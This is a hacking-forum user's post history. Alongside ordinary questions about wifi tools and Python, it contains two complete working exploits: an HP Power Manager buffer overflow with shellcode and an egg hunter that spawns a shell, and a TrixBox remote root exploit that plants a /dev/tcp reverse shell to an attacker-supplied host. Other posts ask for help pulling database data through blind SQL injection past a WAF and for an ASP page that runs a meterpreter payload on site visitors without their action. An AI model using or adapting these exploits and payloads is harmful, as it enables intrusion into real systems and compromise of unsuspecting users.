1
Hacking and Security / Re: Issues with airodump-ng Vbox
« on: November 30, 2015, 03:53:37 pm »
the command airodump-ng wlan0mon should work i would have thought or airodump-ng phy0
Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Pages: [1] 2
2
Hacking and Security / Re: Issues with airodump-ng Vbox
« on: November 30, 2015, 03:09:57 pm »
Realtek wireless chips always have worked for me with Kali, but yeah as above, don't bridge your device.
3
General discussion / Re: InfoSec Weekly Roundtable/Discussion
« on: November 30, 2015, 01:48:39 pm »
pretty neat idea
4
Hacking and Security / Blind SQL with WAF
« on: December 24, 2014, 01:53:30 pm »
Hi guys, I came across this application which is using a WAF on certain strings and has some preg_match and preg_replace functions.
Anyway I have managed to get some results although very simple, instead of the usual ' or 1=1 -- i am using the following (1)or(1)=(1) which returns 5 pictures, when i change it to (1)or(1)=(2) then I just get the one picture.
How can i increases on this and start to gather database information? So im struggling to construct and order by or union.
Thanks
Anyway I have managed to get some results although very simple, instead of the usual ' or 1=1 -- i am using the following (1)or(1)=(1) which returns 5 pictures, when i change it to (1)or(1)=(2) then I just get the one picture.
How can i increases on this and start to gather database information? So im struggling to construct and order by or union.
Thanks
5
Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
yes, tried that, this is needed as it's the unique string for th egg hunter which has to be placed before the shellcode. It's kind of a marker.
It's been baffling me for a few days now
It's been baffling me for a few days now
6
Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box
The RET address is universal
The box is exploitable
I think it's something to do with the Egg Hunter appended "n00bn00b"
Any help would be appreciated
The RET address is universal
The box is exploitable
I think it's something to do with the Egg Hunter appended "n00bn00b"
Any help would be appreciated
Code: [Select]
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x38"
"\x4e\x56\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x48"
"\x49\x38\x4e\x36\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x43\x4b\x4d"
"\x46\x46\x4b\x38\x43\x54\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x46"
"\x50\x48\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x46\x4a\x36\x43\x43\x44\x33\x4a\x46\x47\x47\x43\x57"
"\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x45\x43\x35\x43\x34"
"\x43\x35\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x41"
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x56\x4a\x46\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x56\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x42"
"\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
"\x41\x30\x41\x55\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()
7
Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video http://www.youtube.com/watch?v=XsFVz1K3sZo&feature=fvsr quality is a bit shitty but should get you started.
8
Scripting Languages / Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
« on: July 14, 2011, 09:03:20 pm »
Great 
Works like a charm
Thanks
Works like a charm
Thanks
9
Scripting Languages / Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
« on: July 14, 2011, 06:30:29 pm »
Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how
10
Scripting Languages / Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
« on: July 14, 2011, 04:14:30 pm »
So you got any ideas on how I can get the session?
11
Scripting Languages / Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
« on: July 13, 2011, 05:55:36 pm »Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.
Any help would be greatly appreciated
Error below
Code: [Select]
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects
Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
if (len(sys.argv)!=5):
print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
def create_post(injection):
buffer=("POST /user/index.php HTTP/1.1 \r\n"
"Host: 192.168.219.132 \r\n"
"Content-Type: application/x-www-form-urlencoded \r\n"
"Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
return buffer
def send_post(host,port,input):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(input)
output=s.recv(1024)
s.close()
return output
def find_sessionid(http_output):
headers=re.split("\n",http_output)
for header in headers:
if re.search("Set-Cookie",header):
cook=header.split(" ")
sessionid=cook[1][10:42]
print "[*] Session ID is %s" % sessionid
return sessionid
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
# milw0rm.com [2008-07-12]
12
.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl
13
.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah I got a shell however it's unprivileged and running as IUSR, I uploaded the exe and to the web server and I navigate to it and manually click on the exe which in turn loads me up a shell via the multi/handler.
The meterpreter shell times out, cant getsystem, or sysinfo or drop into a shell.
The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.
I need an asp page that loads the exe by it's self without me clicking on it., So for example the user navigates to site and the exe is executed.
The meterpreter shell times out, cant getsystem, or sysinfo or drop into a shell.
The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.
I need an asp page that loads the exe by it's self without me clicking on it., So for example the user navigates to site and the exe is executed.
14
General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"
15
General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.
Pages: [1] 2